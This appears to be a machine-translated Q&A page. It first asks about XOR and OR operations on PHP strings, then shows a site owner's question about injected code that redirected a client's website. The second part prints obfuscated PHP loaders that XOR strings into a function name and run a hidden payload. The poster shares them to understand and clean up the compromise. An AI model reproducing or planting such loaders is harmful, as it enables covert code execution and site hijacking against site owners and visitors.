看起来我之前的问题更新没有被注意到,因此是一个新问题.
#dump1
var_dump('two identical strings' | 'two identical strings'); # mind the |
// string(21) "two identical strings"
#dump2
var_dump('two identical strings' ^ 'two identical strings'); # mind the ^
// string(21) ""
Run Code Online (Sandbox Code Playgroud)
为什么#dump2显示长度== 21,但输出无/不可见符号?
另外,当粘贴在Notepad ++中时,该字符串中没有21个符号的迹象,实际上,甚至不是1个符号,而不是来自不同字符串的不同操作的输出. 
这些(DC3),(DC4)等没有在浏览器中显示,但在记事本中显示出来++.
哦,实际上,那个字符串中的那些黑色值是什么?我猜这些是位级/汇编级别的值,但是,呵呵,guess !== true.
一位客户最近找到了一个问题,他们的网站将根据他们的意愿重定向到不同的网站.罪魁祸首原来是以下片段:
// $wp_ac_remote_retrieve_header = ',S7<f-NH9;%.KM7kF0^L2&1YzYJM.>RB,|Mu"C_@}H2#HEFGKSI 5<K8]M"97Z)GM&FbN%CAKL1/Z:JUOD3!9-!.<B0?9kCNWBQ~~k1U7,7i~&>8<(R<NE<^Zb0>2,EQ]R/SS%wSSD!yN,;"#/T$d/>&b|a^v' ^ "I%VPNm)2PUCB*9RC Y2)mAT-%:%#Z[<6_ToZJ,2%R*^B<1i!*> LL^>K4#GJD9L)9C4L-J.n&5PK7S\$z#-QSX_HKOm`wi.;-2.~.6;t-TI[F-N_JYL}y=&T;(MtYUo*?)3F=6WX;6(Q&<IWCWF;JJ_PA@UHwM";
// $get_ho_tag_template = 'cr atDW"ufb4)j.'|'!"E!`%HDTl#pHoJ';
// $start_hg_wp = $get_ho_tag_template(null,$wp_ac_remote_retrieve_header);
// $start_hg_wp();
Run Code Online (Sandbox Code Playgroud)
显然这不是他们第一次遭到黑客攻击,因为我还发现以下片段已经注释掉了:
// $comment_zr_date = 'J4UCmj82"&6D?XQz/_F;kB<:#L,FYR<*+vMYS"87tW8OE# B8>LDS=R+ HI<=8S#G5VG@Q;jM^]@5F<(B+5n_DW6L,CX@Nr=h2X:_MKaq-*FOOXH;>^)+FV90%a7qyg^N3*DVQCT7:MvJkKU' ^ '/B4/E*_HKHP(^,4RI6*^4%YN|/C(-7R^X^ov;MUR[0W=!LN$LNc"2P;GY*<OTV6P4V3)44ID.10oX?]L/B[A3-5D-^*=3a"u8w Y:!d19}o>,*4ghV?[N"yv|`Ng!*H7#RM!farz]J*TcBbn';
// $get_spe_footer = "<=:Q.0(CEVO!8=J" ^ "_O_0ZUw%08,UQR\$";
// $wp_olw_rss = $get_spe_footer(null,$comment_zr_date);
// $wp_olw_rss();
Run Code Online (Sandbox Code Playgroud)
没有其他任何参考这些函数/变量.或者至少在我进行全站搜索时没有出现.此外,文件的权限已更改为只读.
知道他们是如何完成这个的吗?或者上面的代码如何工作/工作?删除后,问题/黑客完全消失.然而,由于这是他们第三次遇到这个问题,我相信他们已经离开了自己的某个地方.请注意,这不是WP站点.
**编辑
文件很大包括,这里是一个链接:
如果你通过base64解码器运行它,你会得到:
但是,我无法进一步解读它.似乎有更多编码或......?